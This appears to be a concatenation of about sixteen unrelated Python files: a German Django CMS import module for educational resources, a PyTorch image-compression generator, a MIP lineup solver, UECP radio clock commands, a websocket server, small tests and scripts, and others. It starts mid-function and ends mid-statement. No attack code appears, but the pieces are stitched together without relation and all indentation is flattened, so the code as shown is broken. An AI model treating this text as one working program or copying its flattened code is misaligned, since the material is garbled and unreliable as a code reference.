out_dict['keypoints_condidence'] = keypoints_condidence.detach()
out_dict['keypoints_location'] = keypoints_location.detach()
return out_dict
|
# -*- coding: utf-8 -*-
"""
/dms/elixier/utils.py
.. enthaelt Hilfefunktionen fuer den Elixier-Austausch
Django content Management System
Hans Rauch
hans.rauch@gmx.net
Die Programme des dms-Systems koennen frei genutzt und den spezifischen
Beduerfnissen entsprechend angepasst werden.
0.01 15.06.2007 Beginn der Arbeit
0.02 19.10.2007 Elixier-Beitraege werden ausgewertet
"""
import string
import datetime
import time
from django.db import transaction
from django.db.models import Q
from django.shortcuts import render_to_response
from django.utils.encoding import smart_unicode
from django.utils.translation import ugettext as _
from dms.roles import require_permission
from dms.settings import EDUFOLDER_BASE_PATH
from dms.models import DmsItemContainer
from dms.utils import show_link
from dms.utils import encode_email
from dms.utils_form import get_item_vars_show
from dms.queries import get_item_container_by_path
#from dms.queries import get_folder_filtered_items
from dms.queries import get_lernrestyp_by_name
from dms.queries import get_medienformat_by_name
from dms.queries import set_extra_data
from dms.queries import get_app
from dms.queries import get_null_license
from dms.queries import get_edu_fach_id_by_name
from dms.queries import get_schulart_id_by_name
from dms.queries import get_schulstufe_id_by_name
from dms.queries import get_edu_sprache_id
from dms.queries import get_zielgruppe_id_by_name
from dms.queries import get_lernrestyp_by_name
from dms.queries import save_item_values
from dms.mail import send_control_email
from dms.edufolder.utils import get_org_image_url
from dms.edufolder.models import DmsEduItem
from dms.edulinkitem.utils import save_schlagworte
from dms.elixier.queries import set_elixier_item_status
from dms.encode_decode import encode_html
from dms.encode_decode import decode_html
from dms_ext.extension import * # dms-Funktionen ueberschreiben
# -----------------------------------------------------
def get_folder_filtered_items(item_container, alpha_mode=False, app_types=[]):
""" liefert die Liste der entsprechenden item_container zurueck """
myQ = None
for app_name in app_types:
if myQ == None:
myQ = Q(item__app__name=app_name)
else:
myQ = myQ | Q(item__app__name=app_name)
items = DmsItemContainer.objects.select_related().\
filter(parent_item_id=item_container.item.id). \
filter(is_deleted=False). \
exclude(item__app__name='dmsUserFolder'). \
filter(myQ). \
order_by('item__title')
return items
# -----------------------------------------------------
@require_permission('perm_manage')
def views_select_dest(request, item_container, op):
""" waehlt Zielordner aus """
def get_edufolders(dest_folder):
""" liefert Uebersicht der Lernarchive """
def get_link(base_folder, folder, title=''):
""" baut den Verweis zusammen """
if folder == '':
folder_name = _(u'oberste Ebene')
else:
folder_name = folder
if title == '':
title = folder_name
path = '%s%s/' % (base_folder, folder)
radio = ''
radio += '<input type="radio" name="folder_new" value="%s" />\n' % path
radio += '<a href="?elixier_op=select_dest&select_folder=%s">%s</a>'
radio = radio % (path, title )
return radio
ret = ''
# --- letztes / entfernen
folders = string.splitfields(dest_folder[:-1], '/')
n_current = 1
base_folder = ''
for folder in folders:
ret += '%s %s<br />\n' % (' . '*n_current, get_link(base_folder, folder) )
base_folder += folder + '/'
n_current += 1
edu_item_container = get_item_container_by_path(EDUFOLDER_BASE_PATH+dest_folder)
folders = get_folder_filtered_items(edu_item_container, app_types=['dmsEduFolder'])
for folder in folders:
ret += '%s %s<br />\n' % \
(' . '*n_current, get_link(base_folder, folder.item.name, folder.item.title))
return ret
app_name = 'elixier'
vars = get_item_vars_show(request, item_container, app_name)
vars['content_div_style'] = 'frame-util-images'
vars['no_breadcrumb'] = True
if request.GET.has_key('select_folder'):
select_folder = request.GET['select_folder']
else:
if request.COOKIES.has_key('elixier_dest_folder'):
select_folder = request.COOKIES['elixier_dest_folder']
else:
select_folder = '/'
request.COOKIES['elixier_dest_folder'] = select_folder
vars['edufolders'] = get_edufolders(select_folder)
return render_to_response ( 'app/elixier/select_destination.html', vars )
# -----------------------------------------------------
@require_permission('perm_add')
#@ transaction.commit_manually
def do_check(request, item, item_org, new_status, dest_folder):
""" """
set_elixier_item_status(item, new_status)
if new_status == 1:
edu_item_container = get_item_container_by_path(EDUFOLDER_BASE_PATH+dest_folder)
new = {}
community_id = 0
schulverbund_id = 0
new['is_exchangeable'] = False
new['string_1'] = decode_html(item_org.quelle_id)
new['string_2'] = item_org.url_datensatz
new['integer_1'] = community_id
new['integer_2'] = schulverbund_id
# --- eine Normierung ist dringend erforderlich
lernrestypen = item_org.lernressourcentyp.replace(',', '|').replace(';', '|')
lernrestypen = string.splitfields(lernrestypen, '|')
found = False
for lernrestyp in lernrestypen:
lernrestyp = lernrestyp.strip()
if lernrestyp != '':
lernrestyp = get_lernrestyp_by_name(lernrestyp)
if lernrestyp != -1:
new['integer_3'] = lernrestyp.id
found = True
if not found:
new['integer_3'] = get_lernrestyp_by_name(_(u'Arbeitsmaterial')).id
new['integer_4'] = get_medienformat_by_name(_(u'Online-Ressource')).id
new['integer_5'] = 1 # zertifikat_id
schlagworte_raw = item_org.schlagwort.replace(';', '\n').replace(',', '\n')
schlagworte = ''
for s in string.splitfields(schlagworte_raw, '\n'):
s = s.strip()
if s != '':
schlagworte += s + '\n'
new['extra'] = encode_html(set_extra_data(schlagwort_org=schlagworte))
new['schlagwort'] = schlagworte
dsatz = item_org.url_datensatz
image_url, image_url_url, image_extern = get_org_image_url(item_org.url_datensatz)
if item_org.bild_url == '' and image_url != '':
new['image_url'] = image_url
new['image_url_url'] = image_url_url
new['image_extern'] = image_extern
elif item_org.bild_url != '':
new['image_url'] = item_org.bild_url
new['image_url_url'] = ''
new['image_extern'] = True
else:
new['image_url'] = item_org.quelle_logo_url
new['image_url_url'] = item_org.quelle_homepage_url
new['image_extern'] = True
#new['app'] = get_app('dmsEduLinkItem')
#new['owner'] = request.user
new['license'] = 1 #get_null_license()
now = smart_unicode(time.time())
name = 'edu_' + now[:string.find(now, '.')] + '.html'
#new['name'] = 'edu_' + now[:string.find(now, '.')] + '.html'
new['title'] = decode_html(item_org.titel)
new['sub_title'] = ''
new['text'] = decode_html(item_org.beschreibung)
# Problem: Originaleinsteller
new['text_more'] = ''
url = item_org.url_ressource.strip()
if not url.startswith('http://'):
url = item_org.url_datensatz.strip()
new['url_more'] = url
new['url_more_extern'] = True
new['is_wide'] = True
new['is_important'] = False
new['info_slot_right'] = ''
new['has_user_support'] = False
new['has_comments'] = edu_item_container.item.has_comments
new['is_moderated'] = edu_item_container.item.is_moderated
item_container_new = save_item_values(request.user, 'dmsEduLinkItem', name, new,
edu_item_container, True, False)
new['autor'] = decode_html(item_org.autor)
new['herausgeber'] = decode_html(item_org.herausgeber)
new['anbieter_herkunft'] = decode_html(item_org.anbieter_herkunft)
new['isbn'] = decode_html(item_org.isbn)
new['preis'] = decode_html(item_org.preis)
new['titel_lang'] = decode_html(item_org.titel_lang)
new['beschreibung_lang'] = encode_html(decode_html(item_org.beschreibung_lang))
if item_org.einsteller != '':
email = encode_email(item_org.einsteller_email, item_org.einsteller)
new['beschreibung_lang'] += '<p>%s: %s</p>\n' % (_(u'Einsteller/in: '), email)
new['publikations_datum'] = item_org.publikationsdatum
new['standards_kmk'] = encode_html(decode_html(item_org.kmk_standards))
new['standards_weitere'] = encode_html(decode_html(item_org.weitere_kompetenzen))
new['techn_voraus'] = encode_html(decode_html(item_org.techn_voraussetzungen))
new['lernziel'] = encode_html(decode_html(item_org.lernziel))
new['lernzeit'] = encode_html(decode_html(item_org.lernzeit))
new['methodik'] = encode_html(decode_html(item_org.methodik))
new['lehrplan'] = encode_html(decode_html(item_org.lehrplanbezug))
new['rechte'] = encode_html(decode_html(item_org.rechte))
edu_item = DmsEduItem.save_values(DmsEduItem(), item_container_new, new, True)
faecher = item_org.fach_sachgebiet.replace(',', '|').replace(';', '|')
faecher = string.splitfields(faecher, '|')
for fach_sachgebiet in faecher:
fach_sachgebiet = fach_sachgebiet.strip()
if fach_sachgebiet != '':
fach_id = get_edu_fach_id_by_name(fach_sachgebiet)
if fach_id != -1:
edu_item.fach_sachgebiet.add(fach_id)
schularten = item_org.schulform.replace(',', '|').replace(';', '|')
schularten = string.splitfields(schularten, '|')
found = False
for schulart in schularten:
schulart = schulart.strip()
if schulart != '':
schulart_id = get_schulart_id_by_name(schulart)
if schulart_id != -1:
edu_item.schulart.add(schulart_id)
found = True
if not found:
for schulart_id in [1, 2, 3]:
edu_item.schulart.add(schulart_id)
schulstufen = item_org.bildungsebene.replace(',', '|').replace(';', '|')
schulstufen = string.splitfields(schulstufen, '|')
for schulstufe in schulstufen:
schulstufe = schulstufe.strip()
if schulstufe != '':
schulstufe_id = get_schulstufe_id_by_name(schulstufe)
if schulstufe_id != -1:
edu_item.schulstufe.add(schulstufe_id)
sprachen = item_org.sprache.replace(',', '|').replace(';', '|')
sprachen = string.splitfields(sprachen, '|')
found = False
for sprache in sprachen:
sprache = sprache.strip()
if sprache != '':
sprache_id = get_edu_sprache_id(sprache)
if sprache_id != -1:
edu_item.sprache.add(sprache_id)
if not found:
sprache_id = get_edu_sprache_id(_(u'de'))
edu_item.sprache.add(sprache_id)
zielgruppen = item_org.zielgruppe.replace(',', '|').replace(';', '|')
zielgruppen = string.splitfields(zielgruppen, '|')
found = False
for zielgruppe in zielgruppen:
zielgruppe = zielgruppe.strip()
if zielgruppe != '':
zielgruppe_id = get_zielgruppe_id_by_name(sprache)
if zielgruppe_id != -1:
edu_item.zielgruppe.add(zielgruppe_id)
found = True
if not found:
for zielgruppe_id in [3, 4, 5]:
edu_item.zielgruppe.add(zielgruppe_id)
save_schlagworte(edu_item, new)
if item_org.verfallsdatum:
v = item_org.verfallsdatum
item_container_new.visible_end = item_org.verfallsdatum
item_container_new.save()
item_container_new.last_modified = item_org.letzte_aenderung
item_container_new.save()
send_control_email(item_container_new)
"""
# autor_email entfaellt
# id_local hat nur interne Bedeutung
# quelle_pfad hat nur interne Bedeutung
#systematikpfad entfaellt - wird bei der Angabe des Zielordners ausgewertet
# zertifizierung entfaellt - muss haendisch ausgewertet werden
#zeitstempel enfaellt
"""
#transaction.commit()
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
# Custom
from src.normalisation import channel, instance
class ResidualBlock(nn.Module):
def __init__(self, input_dims, kernel_size=3, stride=1,
channel_norm=True, activation='relu'):
"""
input_dims: Dimension of input tensor (B,C,H,W)
"""
super(ResidualBlock, self).__init__()
self.activation = getattr(F, activation)
in_channels = input_dims[1]
norm_kwargs = dict(momentum=0.1, affine=True, track_running_stats=False)
if channel_norm is True:
self.interlayer_norm = channel.ChannelNorm2D_wrap
else:
self.interlayer_norm = instance.InstanceNorm2D_wrap
pad_size = int((kernel_size-1)/2)
self.pad = nn.ReflectionPad2d(pad_size)
self.conv1 = nn.Conv2d(in_channels, in_channels, kernel_size, stride=stride)
self.conv2 = nn.Conv2d(in_channels, in_channels, kernel_size, stride=stride)
self.norm1 = self.interlayer_norm(in_channels, **norm_kwargs)
self.norm2 = self.interlayer_norm(in_channels, **norm_kwargs)
def forward(self, x):
identity_map = x
res = self.pad(x)
res = self.conv1(res)
res = self.norm1(res)
res = self.activation(res)
res = self.pad(res)
res = self.conv2(res)
res = self.norm2(res)
return torch.add(res, identity_map)
class Generator(nn.Module):
def __init__(self, input_dims, batch_size, C=16, activation='relu',
n_residual_blocks=8, channel_norm=True, sample_noise=False,
noise_dim=32):
"""
Generator with convolutional architecture proposed in [1].
Upscales quantized encoder output into feature map of size C x W x H.
Expects input size (C,16,16)
========
Arguments:
input_dims: Dimensions of quantized representation, (C,H,W)
batch_size: Number of instances per minibatch
C: Encoder bottleneck depth, controls bits-per-pixel
C = 220 used in [1].
[1] Mentzer et. al., "High-Fidelity Generative Image Compression",
arXiv:2006.09965 (2020).
"""
super(Generator, self).__init__()
kernel_dim = 3
filters = [960, 480, 240, 120, 60]
self.n_residual_blocks = n_residual_blocks
self.sample_noise = sample_noise
self.noise_dim = noise_dim
# Layer / normalization options
cnn_kwargs = dict(stride=2, padding=1, output_padding=1)
norm_kwargs = dict(momentum=0.1, affine=True, track_running_stats=False)
activation_d = dict(relu='ReLU', elu='ELU', leaky_relu='LeakyReLU')
self.activation = getattr(nn, activation_d[activation]) # (leaky_relu, relu, elu)
self.n_upsampling_layers = 4
if channel_norm is True:
self.interlayer_norm = channel.ChannelNorm2D_wrap
else:
self.interlayer_norm = instance.InstanceNorm2D_wrap
self.pre_pad = nn.ReflectionPad2d(1)
self.asymmetric_pad = nn.ReflectionPad2d((0,1,1,0)) # Slower than tensorflow?
self.post_pad = nn.ReflectionPad2d(3)
H0, W0 = input_dims[1:]
heights = [2**i for i in range(5,9)]
widths = heights
H1, H2, H3, H4 = heights
W1, W2, W3, W4 = widths
# (16,16) -> (16,16), with implicit padding
self.conv_block_init = nn.Sequential(
self.interlayer_norm(C, **norm_kwargs),
self.pre_pad,
nn.Conv2d(C, filters[0], kernel_size=(3,3), stride=1),
self.interlayer_norm(filters[0], **norm_kwargs),
)
if sample_noise is True:
# Concat noise with latent representation
filters[0] += self.noise_dim
for m in range(n_residual_blocks):
resblock_m = ResidualBlock(input_dims=(batch_size, filters[0], H0, W0),
channel_norm=channel_norm, activation=activation)
self.add_module(f'resblock_{str(m)}', resblock_m)
# (16,16) -> (32,32)
self.upconv_block1 = nn.Sequential(
nn.ConvTranspose2d(filters[0], filters[1], kernel_dim, **cnn_kwargs),
self.interlayer_norm(filters[1], **norm_kwargs),
self.activation(),
)
self.upconv_block2 = nn.Sequential(
nn.ConvTranspose2d(filters[1], filters[2], kernel_dim, **cnn_kwargs),
self.interlayer_norm(filters[2], **norm_kwargs),
self.activation(),
)
self.upconv_block3 = nn.Sequential(
nn.ConvTranspose2d(filters[2], filters[3], kernel_dim, **cnn_kwargs),
self.interlayer_norm(filters[3], **norm_kwargs),
self.activation(),
)
self.upconv_block4 = nn.Sequential(
nn.ConvTranspose2d(filters[3], filters[4], kernel_dim, **cnn_kwargs),
self.interlayer_norm(filters[4], **norm_kwargs),
self.activation(),
)
self.conv_block_out = nn.Sequential(
self.post_pad,
nn.Conv2d(filters[-1], 3, kernel_size=(7,7), stride=1),
)
def forward(self, x):
head = self.conv_block_init(x)
if self.sample_noise is True:
B, C, H, W = tuple(head.size())
z = torch.randn((B, self.noise_dim, H, W)).to(head)
head = torch.cat((head,z), dim=1)
for m in range(self.n_residual_blocks):
resblock_m = getattr(self, f'resblock_{str(m)}')
if m == 0:
x = resblock_m(head)
else:
x = resblock_m(x)
x += head
x = self.upconv_block1(x)
x = self.upconv_block2(x)
x = self.upconv_block3(x)
x = self.upconv_block4(x)
out = self.conv_block_out(x)
return out
if __name__ == "__main__":
C = 8
y = torch.randn([3,C,16,16])
y_dims = y.size()
G = Generator(y_dims[1:], y_dims[0], C=C, n_residual_blocks=3, sample_noise=True)
x_hat = G(y)
print(x_hat.size()) |
__all__ = ['Role']
from dataclasses import dataclass
from multibot import constants
from multibot.models.database import db
from multibot.models.enums import Platform
from multibot.models.event_component import EventComponent
@dataclass(eq=False)
class Role(EventComponent):
collection = db.role
_unique_keys = ('platform', 'id', 'name', 'is_admin')
platform: Platform = None
id: int = None
name: str = None
is_admin: bool = None
original_object: constants.ROLE = None
|
n = int(input())
h = list(map(int, input().split()))
e = 0
x = 0
dollars_spent = 0
for i in range(n):
y = h[i]
e += x - y
if e < 0:
dollars_spent += abs(e)
e = 0
x = h[i]
print(dollars_spent)
|
from argparse import ArgumentParser
from webmnist.export import export
from webmnist.train import train
parser = ArgumentParser()
parser.add_argument("-o", "--output", type=str, required=True)
parser.add_argument("-e", "--epochs", type=int, default=3)
parser.add_argument( "--train", action="store_true")
parser.add_argument( "--export", action="store_true")
args = parser.parse_args()
if args.train: train(args.output, epochs=args.epochs)
if args.export: export(args.output) |
from copy import copy
from typing import cast, Optional, List, Union, Iterable
from pydfs_lineup_optimizer.solvers.base import Solver
from pydfs_lineup_optimizer.solvers.constants import SolverSign
from pydfs_lineup_optimizer.solvers.exceptions import SolverException, SolverInfeasibleSolutionException
try:
from mip import Model, maximize, xsum, Var
from mip.constants import MAXIMIZE, BINARY, INTEGER, OptimizationStatus
except ImportError:
raise ImportError('You should install mip library before using this backend')
class MIPVariable:
def __init__(
self,
name: str,
min_value: Optional[int] = None,
max_value: Optional[int] = None,
multiplier: Optional[int] = None
):
self.name = name
self.min_value = min_value
self.max_value = max_value
self.multiplier = multiplier
self.__cache = None
def setup(self, solver: Model):
if any([self.min_value, self.max_value]):
var = solver.add_var(name=self.name, lb=self.min_value, ub=self.max_value, var_type=INTEGER)
else:
var = solver.add_var(name=self.name, var_type=BINARY)
self.__cache = var
def get_var(self, solver: Model) -> Var:
if self.__cache:
var = self.__cache
else:
var = solver.var_by_name(self.name)
self.__cache = var
if self.multiplier:
return self.multiplier * var
return var
def __mul__(self, other: int) -> 'MIPVariable':
return MIPVariable(self.name, self.min_value, self.max_value, other)
def __rmul__(self, other: int) -> 'MIPVariable':
return self * other
class MIPConstraint:
def __init__(
self,
variables: Iterable[MIPVariable],
coefficients: Optional[Iterable[float]],
sign: str,
rhs: Union[float, MIPVariable],
name: Optional[str] = None
):
self.variables = variables
self.coefficients = coefficients
self.sign = sign
self.rhs = rhs
self.name = name
def __str__(self):
return f'{[var.name for var in self.variables]} {self.sign} {self.rhs}'
def setup(self, solver):
variables = self.variables
coefficients = self.coefficients
sign = self.sign
rhs = self.rhs
name = self.name
if coefficients:
lhs = xsum([variable.get_var(solver) * coefficient for variable, coefficient in zip(variables, coefficients)])
else:
lhs = xsum([var.get_var(solver) for var in variables])
if isinstance(rhs, MIPVariable):
rhs = rhs.get_var(solver)
if sign == SolverSign.EQ:
solver += (lhs == rhs, name) if name else lhs == rhs
elif sign == SolverSign.NOT_EQ:
solver += (lhs != rhs, name) if name else lhs != rhs
elif sign == SolverSign.GTE:
solver += (lhs >= rhs, name) if name else lhs >= rhs
elif sign == SolverSign.LTE:
solver += (lhs <= rhs, name) if name else lhs <= rhs
else:
raise SolverException('Incorrect constraint sign')
class MIPObjective:
def __init__(self, variables: List[MIPVariable], coefficients: List[float]):
self.variables = variables
self.coefficients = coefficients
def setup(self, solver: Model):
solver.objective = maximize(xsum(
variable.get_var(solver) * coefficient for variable, coefficient in zip(self.variables, self.coefficients)))
class MIPSolver(Solver):
def __init__(self):
self.model = None # type: Optional[Model]
self._vars = {}
self._constraints = []
self._objective = None
def setup_solver(self) -> None:
self.model = Model(name='pydfs_lineup_optimizer', sense=MAXIMIZE)
self.model.solver.set_verbose(0)
def add_variable(self, name, min_value=None, max_value=None):
var = MIPVariable(name, min_value, max_value)
if name in self._vars:
raise ValueError(name)
self._vars[name] = var
return var
def set_objective(self, variables, coefficients):
self._objective = MIPObjective(variables, coefficients)
def add_constraint(self, variables, coefficients, sign, rhs, name=None):
self._constraints.append(MIPConstraint(
variables,
coefficients,
sign,
rhs,
name
))
def copy(self):
new_solver = type(self)()
new_solver.setup_solver()
new_solver._vars = copy(self._vars)
new_solver._constraints = copy(self._constraints)
new_solver._objective = self._objective
return new_solver
def solve(self):
model = cast(Model, self.model)
for var in self._vars.values():
var.setup(model)
for constraint in self._constraints:
constraint.setup(model)
cast(MIPObjective, self._objective).setup(model)
status = model.optimize()
if status not in (OptimizationStatus.OPTIMAL, OptimizationStatus.FEASIBLE):
raise SolverInfeasibleSolutionException([])
result = []
for variable in model.vars: # type: ignore
val = variable.x
if val is not None and round(val) >= 1.0:
result.append(self._vars[variable.name])
return result
|
# -*- coding: utf-8 -*-
'''
{{module_name}} execution module
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
{{short_description}}
.. versionadded:: {{version}}
:configuration:
.. code-block:: yaml
<your example config>
'''
# Import Python libs
from __future__ import absolute_import
import logging
# Import salt libs
import salt.utils.compat
# Import third party libs
try:
# Import libs...
{% if depending_libraries %}
import {{depending_libraries}}
{% endif %}
HAS_LIBS = True
MISSING_PACKAGE_REASON = None
except ImportError as ie:
HAS_LIBS = False
MISSING_PACKAGE_REASON = ie.message
log = logging.getLogger(__name__)
__virtualname__ = '{{virtual_name}}'
def __virtual__():
'''
Only load this module if dependencies is installed on this minion.
'''
if HAS_LIBS:
return __virtualname__
return (False,
'The {{module_name}} execution module failed to load:'
'import error - {0}.'.format(MISSING_PACKAGE_REASON))
def __init__(opts):
# Put logic here to instantiate underlying jobs/connections
salt.utils.compat.pack_dunder(__name__)
def my_action(params):
# Replace this with your actions
pass
|
'''
niceprints
==========
This module provides functions which add visual flair to your text, to make
your print statements more interesting.
These functions only do the minimum amount of transformation for their effect.
You should do your uppercase/lowercase, text wrap, etc. before calling
these functions.
'''
import shutil
from voussoirkit import dotdict
from voussoirkit import stringtools
SINGLE_BOX = dotdict.DotDict(
upper_left='┌',
upper_right='┐',
top='─',
lower_left='└',
lower_right='┘',
side='│',
)
DOUBLE_BOX = dotdict.DotDict(
upper_left='╔',
upper_right='╗',
top='═',
lower_left='╚',
lower_right='╝',
side='║',
)
def equals_header(text):
'''
Sample text
===========
'''
return text + '\n' + ('=' * stringtools.unicode_width(text))
def in_box(text, *, boxchars=SINGLE_BOX, title=''):
'''
┌───────────┐
│Sample text│
└───────────┘
╔═══════════╗
║Sample text║
╚═══════════╝
┌Sample Title────────────────────────────────┐
│There is breaking news about an urgent topic│
│and you'll never guess what it is │
└────────────────────────────────────────────┘
This function does not perform text wrapping. Wrap your text before putting
it in the box.
'''
lines = text.splitlines()
widths = {line: stringtools.unicode_width(line) for line in lines}
if len(widths) == 0:
longest_line = 0
else:
longest_line = max(widths.values())
box_width = max(longest_line, stringtools.unicode_width(title))
top = title + boxchars.top * (box_width - stringtools.unicode_width(title))
bottom = boxchars.top * box_width
new_lines = []
new_lines.append(boxchars.upper_left + top + boxchars.upper_right)
for line in lines:
space_needed = box_width - widths[line]
space = ' ' * space_needed
new_lines.append(f'{boxchars.side}{line}{space}{boxchars.side}')
new_lines.append(boxchars.lower_left + bottom + boxchars.lower_right)
return '\n'.join(new_lines)
def solid_hash_header(text):
'''
# Sample text ##############################################################
'''
cli_width = shutil.get_terminal_size()[0]
# One left hash, space, and space after text.
right_count = cli_width - (stringtools.unicode_width(text) + 3)
right_hashes = '#' * right_count
return f'# {text} {right_hashes}'
|
from sepal_ui import model
from traitlets import Any
class OrderModel(model.Model):
order_index = Any(None).tag(sync=True)
orders = Any(None).tag(sync=True)
session = Any(None).tag(sync=True)
quads = Any(None).tag(sync=True)
|
from nonebot.rule import to_me
from nonebot import on_message
from nonebot.adapters.cqhttp import Bot, MessageEvent
from .data_source import get_message_reply, ChatMessageReply
chat = on_message(rule=to_me(), priority=10)
@chat.handle()
async def chat_handle(bot: Bot, event: MessageEvent):
if str(event.message):
reply = ChatMessageReply(event.get_plaintext())
msg = await reply.reply()
await chat.finish(msg)
await chat.finish("亲爱的怎么啦!有什么事吗?")
|
import struct
import typing
import zoneinfo
from datetime import datetime, timedelta, timezone
from uecp.commands import UECPCommand
from uecp.commands.base import (
UECPCommandDecodeElementCodeMismatchError,
UECPCommandDecodeNotEnoughData,
)
@UECPCommand.register_type
class RealTimeClockSetCommand(UECPCommand):
ELEMENT_CODE = 0x0D
UTC = zoneinfo.ZoneInfo("UTC")
def __init__(self, timestamp: typing.Optional[datetime] = None):
self._timestamp = datetime.now(self.UTC)
if timestamp is not None:
self.timestamp = timestamp
@property
def timestamp(self) -> datetime:
return self._timestamp
@timestamp.setter
def timestamp(self, value: typing.Optional[datetime]):
if value is None:
self._timestamp = datetime.now(self.UTC)
return
if value.tzinfo is None:
raise ValueError("Missing timezone")
self._timestamp = value
def encode(self) -> list[int]:
ts = self._timestamp.astimezone(self.UTC)
data = [
self.ELEMENT_CODE,
ts.year % 100,
ts.month,
ts.day,
ts.hour,
ts.minute,
ts.second,
round(ts.microsecond / 10_000),
self._encode_localtime_offset(self._timestamp.utcoffset() or timedelta()),
]
return data
@classmethod
def create_from(
cls, data: typing.Union[bytes, list[int]]
) -> tuple["RealTimeClockSetCommand", int]:
data = list(data)
if len(data) < 9:
raise UECPCommandDecodeNotEnoughData(len(data), 9)
(
mec,
year,
month,
day,
hour,
minute,
second,
centisecond,
encoded_localtime_offset,
) = data
if mec != cls.ELEMENT_CODE:
raise UECPCommandDecodeElementCodeMismatchError(mec, cls.ELEMENT_CODE)
offset = cls._decode_localtime_offset(encoded_localtime_offset)
timestamp = datetime(
year=year + 2000,
month=month,
day=day,
hour=hour,
minute=minute,
second=second,
microsecond=centisecond * 10_000,
tzinfo=cls.UTC,
).astimezone(timezone(offset))
return cls(timestamp=timestamp), 9
@staticmethod
def _encode_localtime_offset(offset: timedelta):
offset_seconds = offset.total_seconds()
sign = offset_seconds < 0
localtime_offset = (sign << 6) | abs(round(offset_seconds / 1800))
return localtime_offset
@staticmethod
def _decode_localtime_offset(encoded_localtime_offset: int) -> timedelta:
if not (0x00 <= encoded_localtime_offset <= 0x3F):
raise ValueError(f"{encoded_localtime_offset:x} not in [0x00, 0x3f]")
sign = -1 if encoded_localtime_offset & (1 << 6) else 1
offset_seconds = sign * (encoded_localtime_offset & 0b11111) * 1800
return timedelta(seconds=offset_seconds)
@UECPCommand.register_type
class RealTimeClockCorrectionSetCommand(UECPCommand):
ELEMENT_CODE = 0x09
_STRUCT = struct.Struct(">h")
def __init__(self, adjustment_ms: int = 0):
self._adjustment_ms = 0
self.adjustment_ms = adjustment_ms
@property
def adjustment_ms(self) -> int:
return self._adjustment_ms
@adjustment_ms.setter
def adjustment_ms(self, value):
if not (-32768 <= value <= 32767):
raise ValueError()
self._adjustment_ms = int(value)
def encode(self) -> list[int]:
return [self.ELEMENT_CODE] + list(self._STRUCT.pack(self._adjustment_ms))
@classmethod
def create_from(
cls, data: typing.Union[bytes, list[int]]
) -> tuple["RealTimeClockCorrectionSetCommand", int]:
data = list(data)
if len(data) < 3:
raise UECPCommandDecodeNotEnoughData(len(data), 3)
mec = data[0]
if mec != cls.ELEMENT_CODE:
raise UECPCommandDecodeElementCodeMismatchError(mec, cls.ELEMENT_CODE)
adjustment_ms = cls._STRUCT.unpack(bytes(data[1:3]))[0]
return cls(adjustment_ms=adjustment_ms), 3
@UECPCommand.register_type
class RealTimeClockEnabledSetCommand(UECPCommand):
ELEMENT_CODE = 0x19
def __init__(self, enable: bool):
self._enable = bool(enable)
@property
def enable(self):
return self._enable
@enable.setter
def enable(self, value):
self._enable = bool(value)
def encode(self) -> list[int]:
return [self.ELEMENT_CODE, int(self._enable)]
@classmethod
def create_from(
cls, data: typing.Union[bytes, list[int]]
) -> tuple["RealTimeClockEnabledSetCommand", int]:
data = list(data)
if len(data) < 2:
raise UECPCommandDecodeNotEnoughData(len(data), 2)
mec, enable = data[0:2]
if mec != cls.ELEMENT_CODE:
raise UECPCommandDecodeElementCodeMismatchError(mec, cls.ELEMENT_CODE)
if enable not in (0x00, 0x01):
raise ValueError("Not allowed value decoded")
return cls(enable=bool(enable)), 2
|
#############################################
## MODULE VARIABLES
#############################################
print('Load wsServer')
import sys, time, json, asyncio, traceback
import websockets, noteTool
_parent = sys.modules["__main__"]
_options = None
#######################################
async def deliverPayload(connection, payload):
#######################################
#try:
#print('deliverPayload: ', payload)
await connection.send(noteTool.object2serial(payload))
#except:
# print('Abort deliverPayload', sys.exc_info()[0])
# traceback.print_exc()
#######################################
async def onConnect(connection, path):
#######################################
print(f'*** Connected client on wsServer')
#await connection.send('{"format": "greeting", "greeting": "Hello?", "from": ""}')
async for data in connection:
try:
payload = noteTool.serial2object(data)
if(hasattr(_parent, 'receivedPayload')): await _parent.receivedPayload(connection, payload)
except:
print('Abort onConnect', sys.exc_info()[0])
traceback.print_exc()
#######################################
def start(options):
#######################################
print('Start wsServer')
while(True):
try:
print(f'*** Start wsServer on address: {options["address"]}, port: {options["port"]}')
asyncio.set_event_loop(asyncio.new_event_loop())
server = websockets.serve(onConnect, options["address"], options["port"])
asyncio.get_event_loop().run_until_complete(server)
print(f'*** Wait for client connections')
asyncio.get_event_loop().run_forever()
except:
print('Abort start', sys.exc_info()[0])
traceback.print_exc()
#######################################
# MAIN
#######################################
# Run this module on main thread to unit test with following code
if __name__ == "__main__":
options = {
"endpoint": "ws://192.168.0.164:8080",
"address": "192.168.0.164",
"port": "8080",
"path": "/",
"queue": None,
"onEvent": None
}
start(options) |
# Module to test Icon
#-------------------------------------------------------------------------------
import pytest
import math
import numpy as np
import sympy
import probayes as pb
#-------------------------------------------------------------------------------
LOG_TESTS = [(math.exp(1.),1.)]
INC_TESTS = [(3,4)]
#-------------------------------------------------------------------------------
@pytest.mark.parametrize("inp,out", LOG_TESTS)
def test_log(inp, out):
x = pb.Icon('x')
expr = sympy.log(x[:])
output = float(expr.subs({'x': inp}))
close = np.isclose(output, out)
if isinstance(inp, np.ndarray):
assert np.all(close), "Output values not as expected"
else:
assert close, "Output value {} not as expected {}".format(output, out)
#-------------------------------------------------------------------------------
@pytest.mark.parametrize("inp,out", INC_TESTS)
def test_inc(inp, out):
x = pb.Icon('x')
expr = x[:]+1
output = int(expr.subs({'x': inp}))
close = np.isclose(output, out)
if isinstance(inp, np.ndarray):
assert np.all(close), "Output values not as expected"
else:
assert close, "Output value {} not as expected {}".format(output, out)
#-------------------------------------------------------------------------------
|
from turtle import *
bgcolor("green") # Define Background Color
pencolor("red") # Define the color of Pen, i.e our pattern's color
pensize(10) # Define the size of Pen, i.e. the width of our pattern's line
radius = 100 # Define the radius of each circle
turning_angle = 36 # Define how much the next circle turns away from the previous one.
# A counter of totally how much the angle is turned. It starts with zero.
total_turned_angle = 0
while total_turned_angle < 360:
# While loop, when the total angle is less than 360, i.e a round.
circle(radius) # Draw a circle
# Turn right after you finish a circle, to prepare the new position of the next circle.
right(turning_angle)
# Accumulate the turning angle into the counter
total_turned_angle = total_turned_angle + turning_angle
exitonclick() # Exit when you click the screen |
#!/usr/bin/env python
import glob
from pyraf import iraf
import json
from sys import argv
objlist = argv[1]
with open('myccds.json') as file:
settings = json.loads(file.read())
side = settings['mysettings']['side']
if side == "Blue":
